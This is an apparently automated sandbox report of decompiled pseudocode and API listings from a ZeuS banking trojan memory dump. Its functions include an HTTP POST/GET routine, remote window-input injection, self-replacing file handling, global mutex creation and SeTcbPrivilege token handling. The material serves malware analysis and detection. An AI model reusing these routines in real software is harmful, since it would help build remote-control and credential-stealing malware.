					if( *((char*)( *((intOrPtr*)(_t85 + 0x10)) + 0x124)) != 1) {
						goto L14;
					}
					return _v5;
				} else {
					ResetEvent( *(_t85 + 0xc));
					_t86 = _t89->left & 0x0000ffff;
					if(PostMessageW(_a4,  *(_t85 + 8), (_t89->top & 0x0000ffff) << 0x00000010 | _t89->left & 0x0000ffff, (_t89->bottom & 0x0000ffff) << 0x00000010 | _t89->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t85 + 0xc), 0x64) != 0) {
						goto L8;
					} else {
						goto L16;
					}
				}
			}

APIs
    • Part of subcall function 0040D2F3: GetClassNameW.USER32 ref: 0040D30E
  • GetWindowThreadProcessId.USER32(?,?), ref: 00417A80
  • ResetEvent.KERNEL32(?), ref: 00417ACF
  • PostMessageW.USER32(?,?,?,?), ref: 00417AF2
  • WaitForSingleObject.KERNEL32(?,00000064), ref: 00417B01
  • ResetEvent.KERNEL32(?,?,?,00000010), ref: 00417B2C
  • PostThreadMessageW.USER32 ref: 00417B3C
  • WaitForSingleObject.KERNEL32(?,000003E8,?,00000010), ref: 00417B4E
    • Part of subcall function 0040983F: StringFromGUID2.OLE32(?,2937498D,00000028,?,?,00000010,00000000,77E49EB0), ref: 004098E5
    • Part of subcall function 004089C9: OpenMutexW.KERNEL32(00100000,00000000,00000000,0041D2D4,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 004089D4
    • Part of subcall function 004089C9: CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 004089DF
  • TerminateProcess.KERNEL32(0000017C,00000000,?,00000010), ref: 00417B73
    • Part of subcall function 00406BF5: CloseHandle.KERNEL32(?,74B5F560,0040D69A,00000000,00423238,00000000,0040D7CC,00000000,00000000), ref: 00406C04
    • Part of subcall function 00406BF5: CloseHandle.KERNEL32(?,74B5F560,0040D69A,00000000,00423238,00000000,0040D7CC,00000000,00000000), ref: 00406C0D
  • IntersectRect.USER32 ref: 00417B93
  • FillRect.USER32 ref: 00417BA5
  • DrawEdge.USER32(?,?,0000000A,0000000F), ref: 00417BB9
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CloseHandle$EventMessageObjectPostProcessRectResetSingleThreadWait$ClassDrawEdgeFillFromIntersectMutexNameOpenStringTerminateWindow
  • String ID:
  • API String ID: 2453266691-0
  • Opcode ID: dc374cd7c5d90ff00c98f7a7d9bef844dfd3d98e413072b50fe23ec0cb61aa35
  • Instruction ID: a442a4567639e1a686247409cd510cf6634c0dbc91d18ace0509ae05e8f42296
  • Opcode Fuzzy Hash: dc374cd7c5d90ff00c98f7a7d9bef844dfd3d98e413072b50fe23ec0cb61aa35
  • Instruction Fuzzy Hash: CF419030908204AFEF119FA5CC45FEA7B78AF04344F0480A6FD44EA1A2D779D995DB64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 31%
			E0040ED5F(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
				struct HWND__* _v8;
				char _v12;
				struct HWND__* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				intOrPtr _v68;
				struct tagWINDOWINFO _v92;
				void* __ebx;
				void* __esi;
				intOrPtr _t107;
				struct HWND__* _t108;
				int _t113;
				int _t114;
				signed char _t143;
				struct HWND__* _t144;
				long _t147;
				struct HWND__* _t170;
				long _t171;
				void* _t174;

				_t174 = __eax;
				_t107 =  *((intOrPtr*)(__eax + 0x10));
				_v16 = 0;
				if( *((intOrPtr*)(_t107 + 0x110)) == 0) {
					_t108 =  *((intOrPtr*)(_t107 + 0x108));
					_v16 = _t108;
					if(_t108 != 0) {
						_v32 = E0040D6A0(0, __eax, 0) & 0x0000ffff;
					} else {
						_v32 = 0;
					}
				} else {
					if((_a4 & 0x00000001) != 0) {
						E0040E8D1(_a12, _a8, __eax);
						_a4 = _a4 & 0xfffffffe;
					}
					if((_a4 & 0x00000004) != 0) {
						E0040E862(0, _t174, 0, 0, 1);
					}
				}
				_t143 = _a4;
				 *( *(_t174 + 0x10) + 0x100) = _a8;
				_t113 =  *(_t174 + 0x10);
				 *(_t113 + 0x104) = _a12;
				if(_t143 == 0) {
					L69:
					return _t113;
				}
				_v20 = _t143;
				_t26 =  &_v20;
				 *_t26 = _v20 & 0x00000002;
				if( *_t26 == 0) {
					if((_t143 & 0x00000004) == 0) {
						goto L14;
					} else {
						_push(0);
						goto L13;
					}
				} else {
					_push(1);
					L13:
					E0040D6A0(1, _t174);
					L14:
					_v24 = _t143;
					_t31 =  &_v24;
					 *_t31 = _v24 & 0x00000020;
					if( *_t31 == 0) {
						if((_t143 & 0x00000040) == 0) {
							L19:
							_v28 = _t143;
							_t36 =  &_v28;
							 *_t36 = _v28 & 0x00000008;
							if( *_t36 == 0) {
								if((_t143 & 0x00000010) == 0) {
									L24:
									_t114 =  *(_t174 + 0x10);
									_push( *((intOrPtr*)(_t114 + 0x104)));
									_push( *((intOrPtr*)(_t114 + 0x100)));
									0xc00000 = 0x64;
									_t170 = E00409922(0xc00000,  &_v12);
									_t113 = _v12 + 0xfffffff6;
									_v8 = _t170;
									if(_t113 <= 7) {
										_t113 = GetWindowLongW(_t170, 0xfffffff0);
										if((_t113 & 0x40000000) != 0 && (_t113 & 0x00c00000) != 0xc00000 && (_t113 & 0x80040000) == 0) {
											_t113 = GetParent(_t170);
											if(_t113 != 0) {
												_v8 = _t113;
												_t170 = _t113;
											}
										}
									}
									if(_t170 == 0) {
										L35:
										_t144 = _v16;
										if(_t144 != 0) {
											_t113 = IsWindow(_t144);
											if(_t113 == 0 || _t170 != 0 && _t144 != _t170 && (_v32 & 0x00000007) == 0) {
												if(_a4 != 0x8001) {
													_t113 = E0040E862(0, _t174, 0, 0, 1);
												}
											} else {
												_v8 = _t144;
												_v12 = 1;
												_t170 = _t144;
											}
										}
										goto L43;
									} else {
										_t113 = E0040D2F3(_t170);
										if((_t113 & 0x00000040) == 0) {
											goto L35;
										}
										if(_t170 != _v16) {
											_t113 = E0040E862(_t170, _t174, GetWindowThreadProcessId(_t170, 0), 0, 1);
										}
										_v12 = 1;
										L43:
										if(_t170 == 0) {
											goto L69;
										}
										_v92.cbSize = 0x3c;
										_t113 = GetWindowInfo(_t170,  &_v92);
										if(_t113 == 0) {
											goto L69;
										}
										_t113 = _a8 & 0x0000ffff;
										_t147 = (_a12 & 0x0000ffff) << 0x00000010 | _t113;
										if(_v12 != 1) {
											_t171 = _a4;
										} else {
											_t113 = E0040D2F3(_t170);
											if((_t113 & 0x00000020) == 0) {
												_t113 = _a8 - _v92.rcClient & 0x0000ffff;
												_t171 = (_a12 - _v68 & 0x0000ffff) << 0x00000010 | _t113;
											} else {
												_t171 = _t147;
											}
										}
										if(_v20 == 0) {
											if((_a4 & 0x00000004) == 0) {
												goto L55;
											}
											_push(_t147);
											_push(_t171);
											_push(0xa2);
											_push(0x202);
											goto L54;
										} else {
											_push(_t147);
											_push(_t171);
											_push(0xa1);
											_push(0x201);
											L54:
											_push(_v12);
											_push( &_v92);
											_push(_v8);
											_t113 = E0040EAD1(_t174, 0xc00000);
											L55:
											if(_v24 == 0) {
												if((_a4 & 0x00000040) == 0) {
													L60:
													if(_v28 == 0) {
														if((_a4 & 0x00000010) == 0) {
															L65:
															if((_a4 & 0x00000001) != 0) {
																_t113 = E0040EAD1(_t174, 0xc00000, _v8,  &_v92, _v12, 0x200, 0xa0, _t171, _t147);
															}
															if((_a4 & 0x00000800) != 0) {
																_t113 = PostMessageW(_v8, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | E0040D6A0(0, _t174, 0) & 0x0000ffff, _t147);
															}
															goto L69;
														}
														_push(_t147);
														_push(_t171);
														_push(0xa5);
														_push(0x205);
														L64:
														_push(_v12);
														_push( &_v92);
														_push(_v8);
														_t113 = E0040EAD1(_t174, 0xc00000);
														goto L65;
													}
													_push(_t147);
													_push(_t171);
													_push(0xa4);
													_push(0x204);
													goto L64;
												}
												_push(_t147);
												_push(_t171);
												_push(0xa8);
												_push(0x208);
												L59:
												_push(_v12);
												_push( &_v92);
												_push(_v8);
												_t113 = E0040EAD1(_t174, 0xc00000);
												goto L60;
											}
											_push(_t147);
											_push(_t171);
											_push(0xa7);
											_push(0x207);
											goto L59;
										}
									}
								}
								_push(0);
								L23:
								E0040D6A0(2, _t174);
								goto L24;
							}
							_push(1);
							goto L23;
						}
						_push(0);
						L18:
						E0040D6A0(4, _t174);
						goto L19;
					}
					_push(1);
					goto L18;
				}
			}

APIs
  • GetWindowLongW.USER32(00000000,000000F0), ref: 0040EE6B
  • GetParent.USER32(00000000), ref: 0040EE8D
  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040EEB2
  • IsWindow.USER32(?), ref: 0040EED5
    • Part of subcall function 0040E8D1: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040E8E5
    • Part of subcall function 0040E8D1: ReleaseMutex.KERNEL32(?), ref: 0040E904
    • Part of subcall function 0040E8D1: GetWindowRect.USER32 ref: 0040E911
    • Part of subcall function 0040E8D1: IsRectEmpty.USER32(?), ref: 0040E995
    • Part of subcall function 0040E8D1: GetWindowLongW.USER32(?,000000F0), ref: 0040E9A4
    • Part of subcall function 0040E8D1: GetParent.USER32(?), ref: 0040E9BA
    • Part of subcall function 0040E8D1: MapWindowPoints.USER32 ref: 0040E9C3
    • Part of subcall function 0040E8D1: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040E9E7
  • GetWindowInfo.USER32 ref: 0040EF25
  • PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 0040F062
    • Part of subcall function 0040E862: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040EC9B,00000000), ref: 0040E868
    • Part of subcall function 0040E862: ReleaseMutex.KERNEL32(?), ref: 0040E89C
    • Part of subcall function 0040E862: IsWindow.USER32(?), ref: 0040E8A3
    • Part of subcall function 0040E862: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040E8BD
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
  • String ID: $<$@
  • API String ID: 3705211839-2197183666
  • Opcode ID: 76781731088d02387cdd6cc1059a2ffd8bf6e4151f1678a6fbbdb9f5a0ac4da1
  • Instruction ID: 1cb695ad693c9a44238e2d5df2519328d793623c242eb06703e7959dca27a308
  • Opcode Fuzzy Hash: 76781731088d02387cdd6cc1059a2ffd8bf6e4151f1678a6fbbdb9f5a0ac4da1
  • Instruction Fuzzy Hash: 1F91D330600309BBEB219F56C889FBF7BB5AF80708F14487AF940762D1C7B98995DB58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 90%
			E00406ECE(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
				long _t18;
				char* _t21;
				signed int _t29;
				char* _t30;
				void* _t32;

				_t29 = _a20 & 0x00000002;
				_t18 = 0x8404f700;
				if(_t29 != 0) {
					_t18 = 0x8444f700;
				}
				if((_a20 & 0x00000004) != 0) {
					_t18 = _t18 | 0x00800000;
				}
				_t30 = "POST";
				if((_a20 & 0x00000001) == 0) {
					_t30 = "GET";
				}
				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, "0@", _t18, 0);
				if(_t32 == 0) {
					L15:
					return 0;
				} else {
					if(_t29 == 0) {
						_push(0x13);
						_t21 = "Connection: close\r\n";
						_pop(0);
					} else {
						_t21 = 0;
					}
					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
						L14:
						InternetCloseHandle(_t32);
						goto L15;
					} else {
						_a20 = _a20 & 0x00000000;
						_a8 = 4;
						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
							goto L14;
						} else {
							return _t32;
						}
					}
				}
			}

APIs
  • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,0@,8404F700,00000000), ref: 00406F16
  • HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00406F3D
  • HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00406F62
  • InternetCloseHandle.WININET(00000000), ref: 00406F7A
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
  • String ID: Connection: close$GET$HTTP/1.1$POST$0@
  • API String ID: 3080274660-1907924192
  • Opcode ID: e6ba6fa237fa397d102850c761d88060292463f5f47f8fb78f89f7123e6fcf8f
  • Instruction ID: 0a29cf34bce72aa8e41e6e636da4489b7ac47101995c0c1e65b068d3b0d83761
  • Opcode Fuzzy Hash: e6ba6fa237fa397d102850c761d88060292463f5f47f8fb78f89f7123e6fcf8f
  • Instruction Fuzzy Hash: E311933120020A7BEB118F54EC45FAB3A9CEB14355F11413AFE02FA2D0D7B9DA2087E8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 99%
			E004181BC(WCHAR* __ecx, signed char* _a4) {
				char _v268;
				signed short _v320;
				char _v737;
				signed short _v940;
				char _v1084;
				short _v1604;
				short _v1608;
				intOrPtr _v1612;
				signed char* _v1616;
				signed int _v1620;
				char* _v1624;
				void* _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				char _v1640;
				intOrPtr _v1644;
				signed int _v1648;
				signed int _v1652;
				void* _v1653;
				signed int _v1656;
				void* __ebx;
				void* __esi;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t80;
				signed int _t83;
				long _t84;
				long _t85;
				signed int _t89;
				signed int _t98;
				signed int _t101;
				signed int _t108;
				signed int _t110;
				WCHAR* _t123;
				signed char _t125;
				signed char* _t131;
				signed int _t134;
				void* _t136;
				void* _t140;
				signed int _t141;

				_t128 = __ecx;
				_t131 = _a4;
				_t60 = E0041C97E(__ecx, (0 |  *_t131 != 0x00000000) + 0x78d0c214, 2);
				_v1652 = _t60;
				if(_t60 != 0) {
					_v1628 =  *0x423e74;
					_v1624 =  &_v268;
					_v1636 = E00418018;
					_v1632 = E00418154;
					_v1616 = _t131;
					E0041CC1D( &_v1084);
					E00405222( &_v268,  &_v737, 0x102);
					_t69 =  *_t131 & 0x000000ff;
					__eflags = _t69;
					if(_t69 == 0) {
						_t71 = _v320 >> 0x10;
						__eflags = _t71;
						_v1652 = _t71;
						_t72 = _v320 & 0x0000ffff;
						goto L7;
					} else {
						__eflags = _t69 == 1;
						if(_t69 == 1) {
							_v1652 = _v940 >> 0x10;
							_t72 = _v940 & 0x0000ffff;
							L7:
							_v1648 = _t72;
						}
					}
					_v1652 = _v1652 * 0xea60;
					_v1648 = _v1648 * 0xea60;
					E00405299( &_v1084,  &_v1084, 0, 0x32c);
					_v1616 = 0;
					_t80 = E0041CAA4();
					__eflags = _t80;
					if(_t80 != 0) {
						do {
							__eflags =  *_t131;
							_v1653 = 1;
							if( *_t131 != 0) {
								L24:
								_t83 = E0040BABC();
								_t138 = _t83;
								__eflags = _t83;
								if(__eflags == 0) {
									goto L29;
								} else {
									_v1652 = E0040AD5E(0, _t129, __eflags, _t138, 0x4e23, 0x10000000);
									E004051E6(_t138);
									__eflags = _v1656;
									if(_v1656 == 0) {
										_t131 = _a4;
										goto L33;
									} else {
										_v1620 = _v1620 & 0;
										_t108 = E00417DDC(_t128, _t129,  &_v1620, 1);
										_t131 = _a4;
										__eflags = _t108;
										if(_t108 == 0) {
											L33:
											_t125 = _v1653;
										} else {
											_t131[8] = _t131[8] | 0xffffffff;
											_t110 = E004185D9( &_v1640);
											__eflags = _t110;
											_t125 = (0 | _t110 != 0x00000000) - 0x00000001 & 0x00000002;
											E0040B18B( &(_t131[8]));
											E004051E6(_v1620);
										}
									}
									E004051E6(_v1640);
									__eflags = _t125 - 2;
									if(_t125 != 2) {
										__eflags = _t125;
										if(_t125 != 0) {
											goto L29;
										} else {
											_t84 = _v1652;
										}
									} else {
										_t84 = _v1648;
									}
								}
							} else {
								asm("sbb ebx, ebx");
								E00417C9B( !( ~(_v1604 & 0x0000ffff)) &  &_v1604, _t128, 0);
								_t123 =  &(_t131[0x122]);
								_t89 = GetFileAttributesW( &_v1608);
								__eflags = _t89 - 0xffffffff;
								if(_t89 == 0xffffffff) {
									_t89 = GetFileAttributesW(0x423460);
									__eflags = _t89 - 0xffffffff;
									if(_t89 == 0xffffffff) {
										goto L29;
									} else {
										_t128 = 0x423460;
										goto L14;
									}
								} else {
									_t128 =  &_v1604;
									L14:
									_t129 = _t123;
									E00405587(_t89 | 0xffffffff, _t128, _t129);
									_t140 = CreateFileW(_t123, 0x80000000, 7, 0, 3, 0, 0);
									__eflags = _t140 - 0xffffffff;
									if(_t140 == 0xffffffff) {
										L28:
										E0040A548(_t123);
										goto L29;
									} else {
										_v1616 = E0040A521(_t128, _t140);
										_t134 = _t129;
										CloseHandle(_t140);
										__eflags = _v1616 - 0xffffffff;
										if(_v1616 != 0xffffffff) {
											L17:
											__eflags = _t134;
											if(__eflags > 0) {
												goto L28;
											} else {
												if(__eflags < 0) {
													L20:
													_t98 = lstrcmpiW(_t123,  &_v1604);
													__eflags = _t98;
													if(_t98 == 0) {
														goto L24;
													} else {
														_t141 = E0041C97E(_t128, 0x8793aef2, 2);
														__eflags = _t141;
														if(_t141 == 0) {
															L29:
															_t131 = _a4;
															_t84 = 0x7530;
														} else {
															_t101 = MoveFileExW(_t123,  &_v1604, 0xb);
															__eflags = _t101;
															if(_t101 == 0) {
																goto L29;
															} else {
																E004089B9(_t141);
																__eflags = _t101 | 0xffffffff;
																_t128 =  &_v1608;
																_t129 = _t123;
																E00405587(_t101 | 0xffffffff,  &_v1608, _t123);
																goto L24;
															}
														}
													}
												} else {
													__eflags = _v1612 - 0xffffffff;
													if(_v1612 > 0xffffffff) {
														goto L28;
													} else {
														goto L20;
													}
												}
											}
										} else {
											__eflags = _t134;
											if(_t134 == 0) {
												goto L28;
											} else {
												goto L17;
											}
										}
									}
								}
							}
							_t85 = WaitForSingleObject( *0x423e74, _t84);
							__eflags = _t85 - 0x102;
						} while (_t85 == 0x102);
					}
					E004089B9(_v1644);
					_t136 = 0;
				} else {
					_t136 = 1;
				}
				E004051E6(_t131);
				return _t136;
			}

APIs
    • Part of subcall function 0041C97E: CreateMutexW.KERNEL32(004239E8,00000000,?,?,?,?,?), ref: 0041C99F
  • GetFileAttributesW.KERNEL32(?,00000000,?,00000000,0000032C,?,?,00000102), ref: 00418304
  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0041833D
  • CloseHandle.KERNEL32(00000000,00000000), ref: 0041835B
  • lstrcmpiW.KERNEL32(?,?), ref: 0041838B
    • Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CreateFile$AttributesCloseFreeHandleHeapMutexlstrcmpi
  • String ID: `4B
  • API String ID: 503543330-2490286457
  • Opcode ID: 72f20910d252530821ed3b0f99a47f7b2f322876809adaaeec104fa8e1de4b1b
  • Instruction ID: 004af7308ddd7e556b63512ca4e197fda8bf38736f629d8d9d06e4336c749f34
  • Opcode Fuzzy Hash: 72f20910d252530821ed3b0f99a47f7b2f322876809adaaeec104fa8e1de4b1b
  • Instruction Fuzzy Hash: 1B71A2715083459BD7209F74CC81AAFB7E8EF85324F140A2EB594A62D1EF38C9858B5A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
			E00419BAF(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				char _v92;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				void* _t25;
				long _t27;
				void* _t28;
				long _t29;
				void* _t33;
				void* _t39;
				void* _t41;
				void* _t44;
				long _t49;
				void* _t50;
				void* _t57;
				void* _t62;
				void* _t69;
				void* _t73;
				WCHAR* _t77;
				void* _t78;
				void* _t80;
				void* _t82;

				_t73 = __edx;
				_t70 = __ecx;
				_t22 = E0041C97E(__ecx, 0x743c1521, 2);
				_v28 = _t22;
				if(_t22 != 0) {
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t25 = E0041CAA4();
					__eflags = _t25;
					if(_t25 == 0) {
						L24:
						E004089B9(_v28);
						__eflags = 0;
						return 0;
					}
					_t27 = WaitForSingleObject( *0x423e74, 0xea60);
					__eflags = _t27 - 0x102;
					if(_t27 != 0x102) {
						goto L24;
					}
					do {
						_t28 = E0041D6DE(_t70);
						_v24 = _t28;
						__eflags = _t28;
						if(__eflags == 0) {
							goto L22;
						}
						_t80 = E0040AD5E( &_v16, _t73, __eflags, _t28, 2, 0x20000000);
						_v20 = _t80;
						__eflags = _t80;
						if(__eflags == 0) {
							L21:
							E004051E6(_v20);
							E004051E6(_v24);
							goto L22;
						}
						_t70 = _v16;
						_t33 = E00419644(_v16, __eflags, _t80);
						__eflags = _t33;
						if(_t33 == 0) {
							goto L21;
						} else {
							goto L8;
						}
						do {
							L8:
							_v8 = E004060B6(_t80, 1);
							_v12 = E004060B6(_t80, 2);
							_t39 = E00406595(_t80, E00405D23(_t80));
							_t72 = _v8;
							_t41 = E00406595(_t72, E00405D23(_v8));
							_t70 = _v12;
							_push(E00406595(_t70, E00405D23(_v12)));
							_push(_t41);
							_push(_t39);
							_push(L"Global\\%08X%08X%08X");
							_t73 = 0x20;
							_t77 =  &_v92;
							_t44 = E00405ED9(_t43, _t73, _t77);
							_t82 = _t82 + 0x10;
							__eflags = _t44 - 0x1f;
							if(_t44 != 0x1f) {
								goto L20;
							}
							_t69 = CreateMutexW(0x4239e8, 1, _t77);
							__eflags = _t69;
							if(_t69 == 0) {
								goto L20;
							}
							_t49 = GetLastError();
							__eflags = _t49 - 0xb7;
							if(_t49 == 0xb7) {
								CloseHandle(_t69);
								_t69 = 0;
								__eflags = 0;
							}
							__eflags = _t69;
							if(_t69 != 0) {
								_t50 = 0x10;
								_t78 = E004051B6(_t50);
								__eflags = _t78;
								if(_t78 == 0) {
									L19:
									E004089B9(_t69);
									goto L20;
								}
								 *_t78 = E00405644(_t51 | 0xffffffff, _t80);
								 *(_t78 + 4) = E00405644(_t53 | 0xffffffff, _v8);
								_t57 = E00405644(_t55 | 0xffffffff, _v12);
								__eflags =  *_t78;
								 *(_t78 + 8) = _t57;
								 *(_t78 + 0xc) = _t69;
								if( *_t78 == 0) {
									L18:
									E004051E6( *_t78);
									E004051E6( *(_t78 + 4));
									E004051E6( *(_t78 + 8));
									E004051E6(_t78);
									goto L19;
								}
								__eflags =  *(_t78 + 4);
								if( *(_t78 + 4) == 0) {
									goto L18;
								}
								__eflags = _t57;
								if(_t57 == 0) {
									goto L18;
								}
								_t62 = E00406C1B(0x80000, E00419904, _t78);
								__eflags = _t62;
								if(_t62 != 0) {
									goto L20;
								}
								goto L18;
							}
							L20:
							_t80 = E004060B6(_t80, 3);
							__eflags = _t80;
						} while (_t80 != 0);
						goto L21;
						L22:
						_t29 = WaitForSingleObject( *0x423e74, 0xea60);
						__eflags = _t29 - 0x102;
					} while (_t29 == 0x102);
					goto L24;
				}
				return _t22 + 1;
			}

APIs
    • Part of subcall function 0041C97E: CreateMutexW.KERNEL32(004239E8,00000000,?,?,?,?,?), ref: 0041C99F
  • GetCurrentThread.KERNEL32 ref: 00419BD0
  • SetThreadPriority.KERNEL32(00000000), ref: 00419BD7
  • WaitForSingleObject.KERNEL32(0000EA60), ref: 00419BF5
  • CreateMutexW.KERNEL32(004239E8,00000001,?,20000000), ref: 00419CB8
  • GetLastError.KERNEL32 ref: 00419CC8
  • CloseHandle.KERNEL32(00000000), ref: 00419CD6
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CreateMutexThread$CloseCurrentErrorHandleLastObjectPrioritySingleWait
  • String ID: Global\%08X%08X%08X
  • API String ID: 3448221409-3239447729
  • Opcode ID: e951496050d692263acd574b9c6f5ac67d831be933a3d2cc94b1b99489f5121c
  • Instruction ID: 54be597075d29ce6e8736a2ed35c06c4cc54f9377d57d07cb738b7f925317cb8
  • Opcode Fuzzy Hash: e951496050d692263acd574b9c6f5ac67d831be933a3d2cc94b1b99489f5121c
  • Instruction Fuzzy Hash: 3B41D270A006056BDB217BB2AD56BAF7669AF00718F10053BF511BA2D2DF7D8D908A9C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%
			E0040C0E8(void* __ecx, void* __eflags, void* _a4, void* _a8) {
				void* _v3;
				struct HINSTANCE__* _v8;
				void* _v12;
				void* _v16;
				_Unknown_base(*)()* _v20;
				signed int _v24;
				char _v40;
				char _v60;
				char _v84;
				char _v112;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t30;
				_Unknown_base(*)()* _t42;
				signed int _t44;
				signed int _t53;
				_Unknown_base(*)()* _t56;
				void* _t59;
				CHAR* _t62;
				CHAR* _t63;
				CHAR* _t64;
				_Unknown_base(*)()* _t65;
				WCHAR* _t67;
				void* _t69;

				_t59 = __ecx;
				_t67 =  &_v112;
				E0040F34A(0xdd, _t67);
				_t30 = LoadLibraryW(_t67);
				_v8 = _t30;
				if(_t30 != 0) {
					_t62 =  &_v84;
					E0040F314(0xde, _t62);
					_t56 = GetProcAddress(_v8, _t62);
					_t63 =  &_v40;
					E0040F314(0xdf, _t63);
					_v20 = GetProcAddress(_v8, _t63);
					_t64 =  &_v60;
					E0040F314(0xe0, _t64);
					_t42 = GetProcAddress(_v8, _t64);
					_t69 = 0;
					_t65 = _t42;
					if(_t56 == 0 || _v20 == 0 || _t65 == 0) {
						return FreeLibrary(_v8);
					} else {
						_t44 = E004068B2(L"SeTcbPrivilege");
						__imp__WTSGetActiveConsoleSessionId();
						_v24 = _t44;
						if (_t44 == 0xffffffff) goto L8;
						_t53 = _t44 | 0xff0c75ff;
					}
				}
				return _t30;
			}

APIs
  • LoadLibraryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040CA36,?,?), ref: 0040C0FF
  • GetProcAddress.KERNEL32(?,?), ref: 0040C12B
  • GetProcAddress.KERNEL32(?,?), ref: 0040C142
  • GetProcAddress.KERNEL32(?,?), ref: 0040C15A
  • FreeLibrary.KERNEL32(?,?,?,00000000), ref: 0040C1E3
    • Part of subcall function 004068B2: GetCurrentThread.KERNEL32 ref: 004068C2
    • Part of subcall function 004068B2: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040C177,SeTcbPrivilege), ref: 004068C9
    • Part of subcall function 004068B2: OpenProcessToken.ADVAPI32(000000FF,00000020,0040C177,?,?,?,?,0040C177,SeTcbPrivilege), ref: 004068DB
  • WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0040CA36,?,?,00000000), ref: 0040C177
    • Part of subcall function 0040C077: EqualSid.ADVAPI32(00000000,0040C1F0,?,0040C1F0,?,?,00000000), ref: 0040C09C
    • Part of subcall function 0040C077: CloseHandle.KERNEL32(?,?,0040C1F0,?,?,00000000), ref: 0040C0DD
Strings
Similarity
  • API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
  • String ID: .exe$SeTcbPrivilege
  • API String ID: 1107370034-552748125
  • Opcode ID: 07a03a851cc29a47dc636d2024da1005c32f1dbd70bae0c5d51597395c6b15f2
  • Instruction ID: 7d2c241f2dd00e1f6f1db45960aa21102d85225c3a02adfb3840e92dd33ef4b9
  • Opcode Fuzzy Hash: 07a03a851cc29a47dc636d2024da1005c32f1dbd70bae0c5d51597395c6b15f2
